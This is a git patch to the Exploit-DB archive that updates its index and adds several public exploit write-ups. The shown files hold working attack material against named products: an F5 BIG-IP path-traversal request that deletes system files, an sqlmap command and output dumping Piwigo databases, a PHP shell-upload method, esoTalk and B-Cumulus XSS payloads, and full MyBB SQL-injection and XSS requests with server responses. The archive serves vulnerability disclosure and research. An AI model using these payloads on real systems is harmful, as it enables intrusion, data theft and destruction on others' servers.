From da2dbbdc687eb093b67be063635a8671abddbee8 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 15 Nov 2014 04:45:59 +0000
Subject: [PATCH] Updated 11_15_2014

---
 files.csv                            |  23 +-
 platforms/jsp/webapps/35222.txt      |  55 ++++
 platforms/linux/remote/35232.txt     |   7 +
 platforms/multiple/webapps/35233.txt |   9 +
 platforms/php/webapps/35138.txt      |  21 ++
 platforms/php/webapps/35221.txt      |  98 ++++++
 platforms/php/webapps/35223.txt      |  14 +
 platforms/php/webapps/35224.txt      | 195 ++++++++++++
 platforms/php/webapps/35227.txt      |  15 +
 platforms/php/webapps/35228.txt      |  10 +
 platforms/php/webapps/35231.txt      |   9 +
 platforms/windows/remote/35213.html  | 149 ---------
 platforms/windows/remote/35225.c     |  32 ++
 platforms/windows/remote/35226.py    | 121 ++++++++
 platforms/windows/remote/35229.html  | 211 +++++++++++++
 platforms/windows/remote/35230.rb    | 443 +++++++++++++++++++++++++++
 16 files changed, 1258 insertions(+), 154 deletions(-)
 create mode 100755 platforms/jsp/webapps/35222.txt
 create mode 100755 platforms/linux/remote/35232.txt
 create mode 100755 platforms/multiple/webapps/35233.txt
 create mode 100755 platforms/php/webapps/35138.txt
 create mode 100755 platforms/php/webapps/35221.txt
 create mode 100755 platforms/php/webapps/35223.txt
 create mode 100755 platforms/php/webapps/35224.txt
 create mode 100755 platforms/php/webapps/35227.txt
 create mode 100755 platforms/php/webapps/35228.txt
 create mode 100755 platforms/php/webapps/35231.txt
 delete mode 100755 platforms/windows/remote/35213.html
 create mode 100755 platforms/windows/remote/35225.c
 create mode 100755 platforms/windows/remote/35226.py
 create mode 100755 platforms/windows/remote/35229.html
 create mode 100755 platforms/windows/remote/35230.rb

diff --git a/files.csv b/files.csv
index 6399e820c..3d76f2053 100755
--- a/files.csv
+++ b/files.csv
@@ -14128,7 +14128,7 @@ id,file,description,date,author,platform,type,port
 16358,platforms/windows/remote/16358.rb,"Microsoft IIS ISAPI RSA WebAgent Redirect Overflow",2010-09-20,metasploit,windows,remote,0
 16359,platforms/windows/remote/16359.rb,"Microsoft WINS Service Memory Overwrite",2010-09-20,metasploit,windows,remote,0
 16360,platforms/windows/remote/16360.rb,"Microsoft Windows SMB Relay Code Execution",2010-09-21,metasploit,windows,remote,0
-16361,platforms/windows/remote/16361.rb,"Microsoft Print Spooler Service Impersonation Vulnerability",2011-02-17,metasploit,windows,remote,0
+16361,platforms/windows/remote/16361.rb,"Microsoft Print Spooler Service - Impersonation Vulnerability (MS10-061)",2011-02-17,metasploit,windows,remote,0
 16362,platforms/windows/remote/16362.rb,"Microsoft Server Service Relative Path Stack Corruption",2011-01-21,metasploit,windows,remote,0
 16363,platforms/windows/remote/16363.rb,"Microsoft Windows SRV2.SYS SMB Negotiate ProcessID Function Table Dereference",2010-07-03,metasploit,windows,remote,0
 16364,platforms/windows/remote/16364.rb,"Microsoft RRAS Service Overflow",2010-05-09,metasploit,windows,remote,0
@@ -15842,7 +15842,7 @@ id,file,description,date,author,platform,type,port
 18328,platforms/netware/dos/18328.txt,"Novell Netware XNFS.NLM STAT Notify Remote Code Execution",2012-01-06,"Francis Provencher",netware,dos,0
 18329,platforms/multiple/webapps/18329.txt,"Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities",2012-01-06,"SEC Consult",multiple,webapps,0
 18330,platforms/php/webapps/18330.txt,"wordpress pay with tweet plugin <= 1.1 - Multiple Vulnerabilities",2012-01-06,"Gianluca Brindisi",php,webapps,0
-18334,platforms/windows/local/18334.py,"Microsoft Office 2003 Home/Pro 0day",2012-01-08,"b33f g11tch",windows,local,0
+18334,platforms/windows/local/18334.py,"Microsoft Office 2003 Home/Pro - Code Execution (0day)",2012-01-08,"b33f & g11tch",windows,local,0
 18335,platforms/php/webapps/18335.txt,"MangosWeb SQL Injection Vulnerability",2012-01-08,Hood3dRob1n,php,webapps,0
 18336,platforms/hardware/dos/18336.pl,"AirTies-4450 Unauthorized Remote Reboot",2012-01-08,rigan,hardware,dos,0
 18337,platforms/windows/dos/18337.pl,"M-Player 0.4 - Local Denial of Service Vulnerability",2012-01-08,JaMbA,windows,dos,0
@@ -15853,7 +15853,7 @@ id,file,description,date,author,platform,type,port
 18342,platforms/php/webapps/18342.txt,"SAPID 1.2.3 Stable Remote File Inclusion Vulnerability",2012-01-09,"Opa Yong",php,webapps,0
 18343,platforms/linux/webapps/18343.pl,"Enigma2 Webinterface 1.7.x 1.6.x 1.5.x (linux) Remote File Disclosure",2012-01-09,"Todor Donev",linux,webapps,0
 18344,platforms/php/webapps/18344.txt,"razorCMS 1.2 Path Traversal Vulnerability",2012-01-10,chap0,php,webapps,0
-18345,platforms/windows/remote/18345.py,"TFTP Server 1.4 ST (RRQ) Buffer Overflow Exploit",2012-01-10,b33f,windows,remote,0
+18345,platforms/windows/remote/18345.py,"TFTP Server 1.4 - ST (RRQ) Buffer Overflow Exploit",2012-01-10,b33f,windows,remote,0
 18347,platforms/php/webapps/18347.txt,"Pragyan CMS 3.0 - Remote File Disclosure",2012-01-10,Or4nG.M4N,php,webapps,0
 18348,platforms/php/webapps/18348.txt,"w-cms 2.01 - Multiple Vulnerabilities",2012-01-10,th3.g4m3_0v3r,php,webapps,0
 18349,platforms/windows/local/18349.pl,"Blade API Monitor 3.6.9.2 Unicode Stack Buffer Overflow",2012-01-10,FullMetalFouad,windows,local,0
@@ -19708,7 +19708,7 @@ id,file,description,date,author,platform,type,port
 22486,platforms/cfm/webapps/22486.txt,"InstaBoard 1.3 Index.CFM SQL Injection Vulnerability",2003-04-14,"Jim Dew",cfm,webapps,0
 22487,platforms/asp/webapps/22487.txt,"Web Wiz Site News 3.6 Information Disclosure Vulnerability",2003-04-14,drG4njubas,asp,webapps,0
 22488,platforms/windows/remote/22488.txt,"EZ Publish 2.2.7/3.0 site.ini Information Disclosure Vulnerability",2003-04-15,"gregory Le Bras",windows,remote,0
-22489,platforms/windows/shellcode/22489.cpp,"Windows XP PRO SP3 - Full ROP calc shellcode",2012-11-05,b33f,windows,shellcode,0
+22489,platforms/windows/shellcode/22489.cpp,"Windows XP Pro SP3 - Full ROP calc shellcode",2012-11-05,b33f,windows,shellcode,0
 22490,platforms/multiple/webapps/22490.txt,"ZPanel <= 10.0.1 CSRF, XSS, SQLi, Password Reset",2012-11-05,pcsjj,multiple,webapps,0
 22491,platforms/php/webapps/22491.txt,"EZ Publish 2.2.7/3.0 - Multiple Cross Site Scripting Vulnerabilities",2003-04-15,"gregory Le Bras",php,webapps,0
 22492,platforms/php/webapps/22492.txt,"EZ Publish 2.2.7/3.0 - Multiple Path Disclosure Vulnerabilities",2003-04-15,"gregory Le Bras",php,webapps,0
@@ -31656,6 +31656,7 @@ id,file,description,date,author,platform,type,port
 35135,platforms/php/webapps/35135.txt,"Classified Component for Joomla! SQL Injection Vulnerability",2010-12-22,R4dc0re,php,webapps,0
 35136,platforms/php/webapps/35136.txt,"WordPress Accept Signups Plugin 0.1 'email' Parameter Cross Site Scripting Vulnerability",2010-12-22,clshack,php,webapps,0
 35137,platforms/php/webapps/35137.txt,"Social Share 'vote.php' HTTP Response Splitting Vulnerability",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0
+35138,platforms/php/webapps/35138.txt,"Esotalk CMS 1.0.0g4 -  XSS Vulnerability",2014-11-02,evi1m0,php,webapps,0
 35140,platforms/php/webapps/35140.txt,"MyBB 1.6 search.php keywords Parameter SQL Injection",2010-12-23,"Aung Khant",php,webapps,0
 35141,platforms/php/webapps/35141.txt,"MyBB 1.6 private.php keywords Parameter SQL Injection",2010-12-23,"Aung Khant",php,webapps,0
 35142,platforms/php/webapps/35142.txt,"Social Share 'search' Parameter Cross Site Scripting Vulnerability",2010-12-23,"Aliaksandr Hartsuyeu",php,webapps,0
@@ -31711,7 +31712,19 @@ id,file,description,date,author,platform,type,port
 35210,platforms/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",multiple,webapps,0
 35211,platforms/java/remote/35211.rb,"Visual Mining NetCharts Server Remote Code Execution",2014-11-10,metasploit,java,remote,8001
 35212,platforms/php/webapps/35212.txt,"XCloner Wordpress/Joomla! Plugin - Multiple Vulnerabilities",2014-11-10,"Larry W. Cashdollar",php,webapps,80
-35213,platforms/windows/remote/35213.html,"Internet Explorer 8 MS14-035 Use-After-Free Exploit",2014-11-10,"Ayman Sagy",windows,remote,0
 35216,platforms/windows/local/35216.py,"MS Office 2007 and 2010 - OLE Arbitrary Command Execution",2014-11-12,"Abhishek Lyall",windows,local,0
 35217,platforms/windows/dos/35217.txt,"CorelDRAW X7 CDR File (CdrTxt.dll) Off-By-One Stack Corruption Vulnerability",2014-11-12,LiquidWorm,windows,dos,0
 35218,platforms/php/webapps/35218.txt,"WordPress SupportEzzy Ticket System Plugin 1.2.5 - Stored XSS Vulnerability",2014-11-12,"Halil Dalabasmaz",php,webapps,80
+35221,platforms/php/webapps/35221.txt,"Piwigo 2.6.0 (picture.php, rate param) - SQL Injection",2014-11-13,"Manuel García Cárdenas",php,webapps,80
+35222,platforms/jsp/webapps/35222.txt,"F5 BIG-IP 10.1.0 - Directory Traversal Vulnerability",2014-11-13,"Anastasios Monachos",jsp,webapps,0
+35223,platforms/php/webapps/35223.txt,"Digi Online Examination System 2.0 - Unrestricted File Upload",2014-11-13,"Halil Dalabasmaz",php,webapps,80
+35224,platforms/php/webapps/35224.txt,"MyBB 1.8.X - Multiple Vulnerabilities",2014-11-13,smash,php,webapps,80
+35225,platforms/windows/remote/35225.c,"Avira AntiVir Personal Multiple Code Execution Vulnerabilities (1)",2011-01-14,D.Elser,windows,remote,0
+35226,platforms/windows/remote/35226.py,"Avira AntiVir Personal Multiple Code Execution Vulnerabilities (2)",2011-01-14,D.Elser,windows,remote,0
+35227,platforms/php/webapps/35227.txt,"Alguest 1.1c-patched 'elimina' Parameter SQL Injection Vulnerability",2011-01-14,"Aliaksandr Hartsuyeu",php,webapps,0
+35228,platforms/php/webapps/35228.txt,"CompactCMS 1.4.1 Multiple Cross Site Scripting Vulnerabilities",2011-01-15,NLSecurity,php,webapps,0
+35229,platforms/windows/remote/35229.html,"Internet Explorer <11 - OLE Automation Array Remote Code Execution",2014-11-13,yuange,windows,remote,0
+35230,platforms/windows/remote/35230.rb,"Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF)",2014-11-13,"Wesley Neelen & Rik van Duijn",windows,remote,0
+35231,platforms/php/webapps/35231.txt,"Advanced Webhost Billing System 2.9.2 'oid' Parameter SQL Injection Vulnerability",2011-01-16,ShivX,php,webapps,0
+35232,platforms/linux/remote/35232.txt,"Pango Font Parsing 'pangoft2-render.c' Heap Corruption Vulnerability",2011-01-18,"Dan Rosenberg",linux,remote,0
+35233,platforms/multiple/webapps/35233.txt,"B-Cumulus 'tagcloud' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-01-18,MustLive,multiple,webapps,0
diff --git a/platforms/jsp/webapps/35222.txt b/platforms/jsp/webapps/35222.txt
new file mode 100755
index 000000000..9034b3156
--- /dev/null
+++ b/platforms/jsp/webapps/35222.txt
@@ -0,0 +1,55 @@
++------------------------------------------------------+
++ F5 BIG-IP 10.1.0 - Directory Traversal Vulnerability +
++------------------------------------------------------+
+Affected Product  : F5 BIG-IP
+Vendor Homepage    : http://www.f5.com/
+Version      : 10.1.0
+Vulnerability Category  : Local vulnerability
+Discovered by    : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
+CVE       : CVE-2014-8727
+Patched      : Yes
+
++-------------+
++ Description +
++-------------+
+An authenticated user with either "Resource Administrator" or "Administrator" role privileges is able to arbitrary enumerate files and subsequently delete them off the OS level. Any system file deletion, for instance under /etc, /boot etc would have a major functionality and operational impact for the device.
+
++----------------------+
++ Exploitation Details +
++----------------------+
+An authenticated user with either "Resource Administrator" or "Administrator" role privileges is able to enumerate files on the operating system and subsequently delete them off the OS level.
+
+In order to trigger the flaw, send a HTTP GET request similar to: https://<ip>/tmui/Control/jspmap/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd
+Condition: If file does not exist the application will return "File not found." If the file exists, the user can either send, a similar to, the next HTTP POST request or simply click on the Delete button through the GUI -the button will be displayed only if the enumerated file exists-.
+
+Sample HTTP POST request:
+
+POST /tmui/Control/form HTTP/1.1
+Host: <ip>
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://<ip>/tmui/Control/jspmap/tmui/system/archive/properties.jsp?name=../../../../../etc/passwd
+Cookie: JSESSIONID=6C6BADBEFB32C36CDE7A59C416659494; f5advanceddisplay=""; BIGIPAuthCookie=89C1E3BDA86BDF9E0D64AB60417979CA1D9BE1D4; BIGIPAuthUsernameCookie=admin; F5_CURRENT_PARTITION=Common; f5formpage="/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd"; f5currenttab="main"; f5mainmenuopenlist=""; f5_refreshpage=/tmui/Control/jspmap/tmui/system/archive/properties.jsp%3Fname%3D../../../../../etc/passwd
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 937
+
+_form_holder_opener_=&handler=%2Ftmui%2Fsystem%2Farchive%2Fproperties&handler_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&showObjList=&showObjList_before=&hideObjList=&hideObjList_before=&enableObjList=&enableObjList_before=&disableObjList=&disableObjList_before=&_bufvalue=icHjvahr354NZKtgQXl5yh2b&_bufvalue_before=icHjvahr354NZKtgQXl5yh2b&_bufvalue_validation=NO_VALIDATION&com.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Farchive%2Fproperties&com.f5.util.LinkedAdd.action_override_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&linked_add_id=&linked_add_id_before=&name=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&name_before=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&form_page=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&form_page_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&download_before=Download%3A+..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&restore_before=Restore&delete=Delete&delete_before=Delete
+
++----------+
++ Solution +
++----------+
+F5 has already patched and mitigated the issue, for more information see ID363027 at the following URL:
+  https://support.f5.com/kb/en-us/solutions/public/13000/100/sol13109.html
+  https://support.f5.com/kb/en-us/products/big-ip_ltm/releasenotes/product/relnote_11_0_0_ltm.html
+
++---------------------+
++ Disclosure Timeline +
++---------------------+
+03-11-2014: Vendor notified at security-reporting [at] f5 [dot] com
+04-11-2014: Vendor responded with intent to investigate
+04-11-2014: Shared details with vendor
+05-11-2014: Vendor confirmed the issue is already patched, reference ID363027
+12-11-2014: Public disclosure
\ No newline at end of file
diff --git a/platforms/linux/remote/35232.txt b/platforms/linux/remote/35232.txt
new file mode 100755
index 000000000..8879595ec
--- /dev/null
+++ b/platforms/linux/remote/35232.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/45842/info
+
+Pango is prone to a remote heap-corruption vulnerability.
+
+An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
+
+http://www.exploit-db.com/sploits/35232.zip
diff --git a/platforms/multiple/webapps/35233.txt b/platforms/multiple/webapps/35233.txt
new file mode 100755
index 000000000..0e9ed8ebf
--- /dev/null
+++ b/platforms/multiple/webapps/35233.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45911/info
+
+B-Cumulus is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/path/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
+
+http://www.example.com/path/tagcloud-ru.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E 
\ No newline at end of file
diff --git a/platforms/php/webapps/35138.txt b/platforms/php/webapps/35138.txt
new file mode 100755
index 000000000..ccdbd598b
--- /dev/null
+++ b/platforms/php/webapps/35138.txt
@@ -0,0 +1,21 @@
+/******************************************************
+# Exploit Title: esotalk cms topics xss vulnerability 
+# Google Dork: powered by esotalk
+# Date: 2014-11-01
+# Vul Author: Evi1m0#ff0000team
+# Vul Advisory: http://www.hackersoul.com/post/ff0000-hsdb-0006.html
+# Vendor Homepage: http://esotalk.org/
+# Software Link: http://esotalk.org/download 
+# Tested on: Linux / Windows 
+******************************************************/
+ 
+esotalk cms topics xss vulnerability. The worst is at the topic page, Submit Comment:
+ 
+Payload:
+
+[url=[img]onmouseover=alert(document.cookie);//://hackersoul.com/image.jpg#"aaaaaa[/img]]evi1m0#knownsec[/url]
+
+ 
+You see an alert. 
+
+Proof img url: http://www.hackersoul.com/img/media/37D2E7A3-8A88-4CE2-9E3E-E2.jpg
\ No newline at end of file
diff --git a/platforms/php/webapps/35221.txt b/platforms/php/webapps/35221.txt
new file mode 100755
index 000000000..0cbb6b907
--- /dev/null
+++ b/platforms/php/webapps/35221.txt
@@ -0,0 +1,98 @@
+=============================================
+MGC ALERT 2014-001
+- Original release date: January 12, 2014
+- Last revised:  November 12, 2014
+- Discovered by: Manuel García Cárdenas
+- Severity: 7,1/10 (CVSS Base Score)
+=============================================
+
+I. VULNERABILITY
+-------------------------
+Blind SQL Injection in Piwigo <= v2.6.0
+
+II. BACKGROUND
+-------------------------
+Piwigo is a web application management photo albums, available under the
+License GPL. Is written in PHP and requires a MySQL, PostgreSQL or SQLite
+data.
+
+III. DESCRIPTION
+-------------------------
+This bug was found using the portal without authentication. To exploit the
+vulnerability only is needed use the version 1.0 of the HTTP protocol to
+interact with the application. It is possible to inject SQL code in the
+variable "rate" on the page "picture.php".
+
+IV. PROOF OF CONCEPT
+-------------------------
+The following URL's and parameters have been confirmed to all suffer from
+Blind SQL injection.
+
+/piwigo/picture.php?/1/category/1&action=rate (POST parameter: rate=1)
+
+Exploiting with SQLMap:
+
+python sqlmap.py -u "
+http://192.168.244.129/piwigo/picture.php?/1/category/1&action=rate" --data
+"rate=1" --dbs
+
+[16:32:25] [INFO] the back-end DBMS is MySQL
+web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
+web application technology: PHP 5.3.2, Apache 2.2.14
+back-end DBMS: MySQL 5
+[16:32:25] [INFO] fetching database names
+[16:32:25] [INFO] fetching number of databases
+[16:32:25] [INFO] resumed: 4
+[16:32:25] [INFO] resumed: information_schema
+[16:32:25] [INFO] resumed: mysql
+[16:32:25] [INFO] resumed: phpmyadmin
+[16:32:25] [INFO] resumed: piwigo
+available databases [4]:
+[*] information_schema
+[*] mysql
+[*] phpmyadmin
+[*] piwigo
+
+V. BUSINESS IMPACT
+-------------------------
+Public defacement, confidential data leakage, and database server
+compromise can result from these attacks. Client systems can also be
+targeted, and complete compromise of these client systems is also possible.
+
+VI. SYSTEMS AFFECTED
+-------------------------
+Piwigo <= v2.6.0
+
+VII. SOLUTION
+-------------------------
+All data received by the application and can be modified by the user,
+before making any kind of transaction with them must be validated.
+
+VIII. REFERENCES
+-------------------------
+http://www.piwigo.org
+
+IX. CREDITS
+-------------------------
+This vulnerability has been discovered and reported
+by Manuel García Cárdenas (advidsec (at) gmail (dot) com).
+
+X. REVISION HISTORY
+-------------------------
+January 21, 2014 1: Initial release
+
+
+XI. DISCLOSURE TIMELINE
+-------------------------
+January 21, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas
+November 12, 2014 2: Send to the Full-Disclosure lists
+
+XII. LEGAL NOTICES
+-------------------------
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+
+XIII. ABOUT
+-------------------------
+Manuel Garcia Cardenas
+Pentester
\ No newline at end of file
diff --git a/platforms/php/webapps/35223.txt b/platforms/php/webapps/35223.txt
new file mode 100755
index 000000000..eda1e0e21
--- /dev/null
+++ b/platforms/php/webapps/35223.txt
@@ -0,0 +1,14 @@
+# Exploit Title:  Digi Online Examination System Unrestricted File Upload Vulnerability
+# Date: 12-10-2014
+# Exploit Author: Halil Dalabasmaz
+# Version: v2.0
+# Software Link: http://codecanyon.net/item/digi-online-examination-system-does/8610180
+# Software Test Link: http://s1.digitalvidhya.com/doesv2/
+
+# Vulnerabilities Description:
+
+===Unrestricted File Upload===
+You can upload your shell from "Photo" section while register the system. And then chekc your shell from here; http://example.com/assets/uploads/images/shellname.php
+
+=Solution=
+Filter the files aganist to attacks.
\ No newline at end of file
diff --git a/platforms/php/webapps/35224.txt b/platforms/php/webapps/35224.txt
new file mode 100755
index 000000000..bbc56f0a9
--- /dev/null
+++ b/platforms/php/webapps/35224.txt
@@ -0,0 +1,195 @@
+#Title: MyBB 1.8.X - Multiple Vulnerabilities
+#Date: 13.11.2014
+#Tested on: Linux / Apache 2.2 / PHP 5 (localhost)
+#Vendor: mybb.com
+#Version:  => 1.8.1 - Latest ATM
+#Contact: smash@devilteam.pl
+#Author: Smash_
+
+
+Latest MyBB forum software suffers on multiple vulnerabilities, including SQL Injection and Cross Site Scripting. Such bugs may allow attacker to perform remote sql queries against the database, and so on.
+
+Sanitize your inputs ;)
+
+
+1. SQL Injection
+
+Vuln:
+POST 'question_id' - ID'+or+1+group+by+concat_ws(0x3a,database(),floor(rand(0)*2))+having+min(0)+or+1#
+
+#1 - Request (question_id=C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+9#):
+POST /mybb-1.8.1/member.php HTTP/1.1
+Host: localhost
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 408
+
+regcheck1=®check2=true&username=woot&password=random&password2=random&email=woot%40woot.com&email2=woot%40woot.com&referrername=&imagestring=6cj5n&imagehash=b2dee8e4028e9cad37e30c31753dfe01&answer=4&question_id=C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+9#&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2®time=1415880544&step=registration&action=do_register
+
+#1 - Response:
+HTTP/1.1 503 Service Temporarily Unavailable
+Date: Thu, 13 Nov 2014 15:16:02 GMT
+		<div id="content">
+			<h2>MyBB SQL Error</h2>
+
+			<div id="error">
+				<p>MyBB has experienced an internal SQL error and cannot continue.</p><dl>
+<dt>SQL Error:</dt>
+<dd>1054 - Unknown column '9' in 'order clause'</dd>
+<dt>Query:</dt>
+			SELECT q.*, s.sid
+			FROM mybb_questionsessions s
+			LEFT JOIN mybb_questions q ON (q.qid=s.qid)
+			WHERE q.active='1' AND s.sid='C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om' ORDER BY 9#'
+		</dd>
+
+
+#2 - Request (question_id=-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+8#):
+POST /mybb-1.8.1/member.php HTTP/1.1
+Host: localhost
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 409
+
+regcheck1=®check2=true&username=woot&password=random&password2=random&email=woot%40woot.com&email2=woot%40woot.com&referrername=&imagestring=6cj5n&imagehash=b2dee8e4028e9cad37e30c31753dfe01&answer=4&question_id=-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+8#&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2®time=1415880544&step=registration&action=do_register
+
+#2 - Response:
+HTTP/1.1 200 OK
+Date: Thu, 13 Nov 2014 15:21:15 GMT
+(...)
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!-- start: member_register -->
+<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<title>Forums - Registration</title>
+
+
+#3 - Request (Final POC):
+POST /mybb-1.8.1/member.php HTTP/1.1
+Host: localhost
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 475
+
+regcheck1=®check2=true&username=woot&password=random&password2=random&email=woot%40woot.com&email2=woot%40woot.com&referrername=&imagestring=6cj5n&imagehash=b2dee8e4028e9cad37e30c31753dfe01&answer=4&question_id=-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+or+1+group+by+concat_ws(0x3a,database(),floor(rand(0)*2))+having+min(0)+or+1#&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2®time=1415880544&step=registration&action=do_register
+
+#3 - Response:
+HTTP/1.1 503 Service Temporarily Unavailable
+Date: Thu, 13 Nov 2014 15:24:34 GMT
+(...)
+		<div id="content">
+			<h2>MyBB SQL Error</h2>
+
+			<div id="error">
+				<p>MyBB has experienced an internal SQL error and cannot continue.</p><dl>
+<dt>SQL Error:</dt>
+<dd>1062 - Duplicate entry 'mybb:1' for key 'group_key'</dd>
+<dt>Query:</dt>
+<dd>
+			SELECT q.*, s.sid
+			FROM mybb_questionsessions s
+			LEFT JOIN mybb_questions q ON (q.qid=s.qid)
+			WHERE q.active='1' AND s.sid='-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om' or 1 group by concat_ws(0x3a,database(),floor(rand(0)*2)) having min(0) or 1#'
+		</dd>
+</dl>
+(...)
+
+
+
+2. Cross Site Scripting
+
+ a) Reflected XSS - Report post
+
+Vuln:
+GET 'type' - XSS"><script>alert(666)</script>
+
+localhost/mybb-1.8.1/report.php?type=XSS%22%3E%3Cscript%3Ealert%28666%29%3C%2fscript%3E&pid=1
+
+Request:
+GET /mybb-1.8.1/report.php?type=XSS%22%3E%3Cscript%3Ealert%28666%29%3C%2fscript%3E&pid=1 HTTP/1.1
+Host: localhost
+
+Response:
+HTTP/1.1 200 OK
+Set-Cookie: sid=27ec1f0b75b3c6b9d852e6614144a452; path=/mybb-1.8.1/; HttpOnly
+Content-Length: 1247
+Content-Type: text/html
+
+<div class="modal">
+  <div style="overflow-y: auto; max-height: 400px;" class="modal_0">
+  <form action="report.php" method="post" class="reportData_0" onsubmit="javascript: return Report.submitReport(0);">
+<input type="hidden" name="my_post_key" value="c08308117fcadae6609372f46fa97835" />
+<input type="hidden" name="action" value="do_report" />
+<input type="hidden" name="type" value="XSS"><script>alert(666)</script>" />
+<input type="hidden" name="pid" value="0" />
+
+
+ b) Stored XSS - Signature
+
+Vuln:
+POST 'signature' - [video=youtube]http://youtube.com?"+xss="true"+666="[/video]
+
+#1 - Request (change signature):
+POST /mybb-1.8.1/usercp.php HTTP/1.1
+Host: localhost
+Referer: http://localhost/mybb-1.8.1/usercp.php?action=editsig
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 203
+
+my_post_key=c08308117fcadae6609372f46fa97835&signature=%5Bvideo%3Dyoutube%5Dhttp%3A%2F%2Fyoutube.com%3F%22+xss%3D%22true%22+666%3D%22%5B%2Fvideo%5D&updateposts=0&action=do_editsig&submit=Update+Signature
+
+#2 - Request (user's profile):
+GET /mybb-1.8.1/member.php?action=profile&uid=2 HTTP/1.1
+Host: localhost
+Referer: http://localhost/mybb-1.8.1/usercp.php?action=editsig
+
+#2 - Response:
+HTTP/1.1 200 OK
+Set-Cookie: sid=e68f1b6fab0737d7057b546e24d8106e; path=/mybb-1.8.1/; HttpOnly
+Content-Length: 12740
+Content-Type: text/html; charset=UTF-8
+(...)
+<table border="0" cellspacing="0" cellpadding="5" class="tborder tfixed">
+<tr>
+<td class="thead"><strong>user's Signature</strong></td>
+</tr>
+<tr>
+<td class="trow1 scaleimages">[Video: <a href="http://youtube.com?" xss="true" 666="" target="_blank">http://youtube.com?" xss="true" 666="</a>]</td>
+</tr>
+</table>
+<br />
+
+
+ c) Reflected XSS - Templates (AP)
+
+Vuln:
+GET 'title' - title"><script>alert(666)</script>
+
+localhost/mybb-1.8.1/admin/index.php?module=style-templates&action=edit_template&title=calendar"><script>alert(666)</script>&sid=1&expand=1
+
+Request:
+GET /mybb-1.8.1/admin/index.php?module=style-templates&action=edit_template&title=calendar%22%3E%3Cscript%3Ealert(666)%3C/script%3E&sid=1&expand=1 HTTP/1.1
+Host: localhost
+
+Response:
+HTTP/1.1 200 OK
+(...)
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head profile="http://gmpg.org/xfn/1">
+	<title>Editing Template: calendar"><script>alert(666)</script></title>
+
+
+ d) Reflected XSS - Languages (AP)
+
+Vuln:
+GET 'file' - <a onmouseover=alert(666)>woot
+
+localhost/mybb-1.8.1/admin/index.php?module=config-languages&action=edit&lang=english&editwith=&file=<a onmouseover=alert(666)>woot
+
+Request:
+GET /mybb-1.8.1/admin/index.php?module=config-languages&action=edit&lang=english&editwith=&file=%3Ca%20onmouseover=alert(666)%3Ewoot HTTP/1.1
+Host: localhost
+
+Response:
+HTTP/1.1 200 OK
+(...)
+<a href="index.php?module=config-languages">Languages</a> » <a href="index.php?module=config-languages&action=edit&lang=english">English (American)</a> » <span class="active"><a onmouseover=alert(666)>woot</span>
+(...)
+<div class="title"><a onmouseover=alert(666)>woot</div>
